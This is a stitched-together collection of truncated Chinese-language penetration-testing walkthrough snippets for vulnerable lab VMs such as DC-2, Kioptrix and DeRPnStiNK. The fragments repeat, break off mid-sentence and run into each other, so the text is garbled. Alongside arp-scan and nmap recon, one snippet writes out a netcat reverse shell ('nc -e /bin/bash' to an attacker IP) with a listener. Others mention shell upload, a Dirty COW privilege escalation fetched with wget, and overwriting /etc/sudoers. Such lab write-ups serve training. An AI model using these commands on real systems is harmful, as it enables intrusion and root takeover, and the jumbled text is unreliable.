Kn0sky ---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com
owasp靶机应该是每个渗透入门乃至一些高手的一个试炼地之一,以下是我在靶机上搭建虚拟的方法。 1.虚拟机安装 在这里我用的是VMware14,靶机自然也是VM的。 百度云盘传送门【2c4j】 2.owasp靶机下载 下载链接 3.owasp靶机打开 在第二步链接打开之后,将会下载到一个文件 将其解压之后先放着,所放的盘建议有10G以上的内存。 注意看我圈起来的地方,靶机是基于Ubuntu的虚拟机,密码账号都在我圈的地方。 现在点击开启虚拟机就好了。 网络适配器的话就是NAT,为了安全尽量不要用桥接。
wordpress搭建的网站→发现一个插件漏洞任意文件上传→上传shell→python反弹shell→获取vagrant用户密码→登录用户发现可以执行所有命令→sudo su提权→成功获取flag 首先扫描网络获取靶机
前言 最近一直在down各种CTF靶机玩,本次分享的2个靶机因较基础,故合并成一篇文章发表,本文章仅为初学者练手学习使用,大神们勿喷,感谢各位大佬! JIS靶机以拿到5个flag为止,本文攻击的靶机为kioptrix level1 以拿到root权限为止。 靶机下载/搭建: 靶机1: https://pan.baidu.com/s/1kt9dMb423DZhIKXObfbwTw ? 靶机2: http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar ? 开始: JIS靶机全解: 探测网络, IP:192.168.1.135 ? 本次仅为完成获取靶机中全部flag为目的。 Kioptrix靶机过程 先获取靶机IP: 192.168.1.138 ? nmap开路: ?
---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com
前言 挺久没更新靶机渗透文章,近期抽点时间继续更新文章,为什么这篇要2个靶机写在一起哪?因为第一个靶机虽然被困了几天但是其实比较简单故就和另外一个前段时间玩的合并在一起发表了…. 靶机安装/下载 Blacklight靶机下载: https://pan.baidu.com/s/1n1A7UlgDUHL1RdmXN0CDPw DeRPnStiNK靶机下载: https://pan.baidu.com /s/1ayCZ17PHxFe71vbldjGW2w Blacklight靶机IP:172.16.24.92 DeRPnStiNK靶机IP:172.16.24.69 攻击者IP:172.16.24.31 实战 1.Blacklight靶机 老规矩nmap开路,个人习惯直接全端口… 通过端口探测可以看到该靶机开启了2个服务端口,一个是80,一个是9072端口,其中9072端口显示未知服务…. 且权限为root 该靶机完!是不是很简单…. 2.DeRPnStiNK靶机 老规矩!
文章来源|MS08067 安全实验室 本文作者:大方子(Ms08067实验室核心成员) 文章最后附靶机下载地址和完整版PDF 然后我们访问下新的地址 http://192.168.110.140
靶机介绍Haboob团队根据https://www.exploit-db.com/docs/45374发表的论文"XML外部实体注入-解释和利用"制作了这个虚拟机以利用私有网络中的漏洞,我们希望你喜欢这个挑战 靶机攻防攻击主机这里我们使用Kali linux和Windows 11作为本次攻击主机:信息收集由于靶机和攻击者主机Kali处于同一网段,所以我们进行一次网段扫描探测,最终确定靶机IP地址为192.168.204.138nmap -sS 192.168.204.135/24在浏览器中访问靶机的80端口,发现只有一个apache服务启动随后我们进一步探测目标信息,使用dirsearch进行目录扫描dirsearch -u http 随后再次进行base64解码得到一大串数据信息随后保存以上解码后的文件并以php进行运行(需要低版本的PHP,建议PHP5),得到flag:SAFCSP{xxe_is_so_easy}文末小结本篇文章以XXE靶机为例对
arp-scan -I eth0 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.56nmap 192.168.30.56 -A -O -p--A 进行全面扫描 后使用namp扫描靶机。开放22,80端口,8080端口。扫一下80和8080端口目录。 直接就结束了,但是我看到这个靶机还有一个用户。但是都直接拿到root了就没必要了。
arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.66后使用namp扫描靶机。
arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.16后使用namp扫描靶机。 这个靶机突破口在UDP端口上,这个我确实没注意这个东西。nmap 192.168.30.16 -sUudp开放了68,69端口。69的tftp有漏洞。找到一个backup-config的文件。 这样就拿下root了后续其实整个靶机都在测试你拿密钥的能力。但是开始的那个tftp的其实是没想到。
arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.11后使用namp扫描靶机。
arp-scan -I eth1 -l -I 指定eth1这个网卡 -l 扫描出全部主机 我们知道靶机的IP地址在192.168.31.204后使用namp扫描靶机。 因为这个靶机的/usr/sbin/ums2net是提权点。所以我们要创建一个a.conf 写入3000 of=/etc/sudoers。 先开启它,在用echo传东西。 太难了这个靶机。
arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.48后使用namp扫描靶机。
没意思没意思,太难了 按照老套路,上来先找到靶机IP地址,发现IP地址为 192.168.40.135 ? 开放了http服务,访问一下 ? 右键查看源代码,找到一个 .js文件 ? 很巧,16年以前的内核,可以用脏牛,wget到靶机 ? 但是在GCC编译的时候,发现了问题,靶机没有gcc ?
arp-scan -I eth0 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.31.149后使用namp扫描靶机。开发22,8080端口。
arp-scan -I eth0 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.31.72后使用namp扫描靶机。 靶机echo 'nc -e /bin/bash 192.168.31.224 1234' > /tmp/run.shchmod +x /tmp/run.shecho 'tmp/run.sh' > a.txtkali 机mkdir tmpcd tmpecho ''>run.shcd ..python -m http.servernc -lvvp 1234靶机sudo gobuster -u http://192.168.31.224
arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.40后使用namp扫描靶机。
arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.23后使用namp扫描靶机。
arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.31.14nmap 192.168.31.14 -A -O -p--A 进行全面扫描 后使用namp扫描靶机。开放22,80端口。添加一下域名。这个域名在主页面查看源码就可以找到了。80端口的主页面,就说被黑客安排了,还植入了后门。 六百六十六这个靶机还把cat和vi的命令互换了。但是没关系还能用。拿到一个用户和密码。哈哈哈哈哈哈哈,登不上去。六百六十六。看了一下别人的操作,要什么hashcat 破解一下。????这是啥? 这个靶机的密码还会更换的。johnr3v_m4lwh3r3_k1nG!!登上去之后说了给废话。。。看一下怎么提权。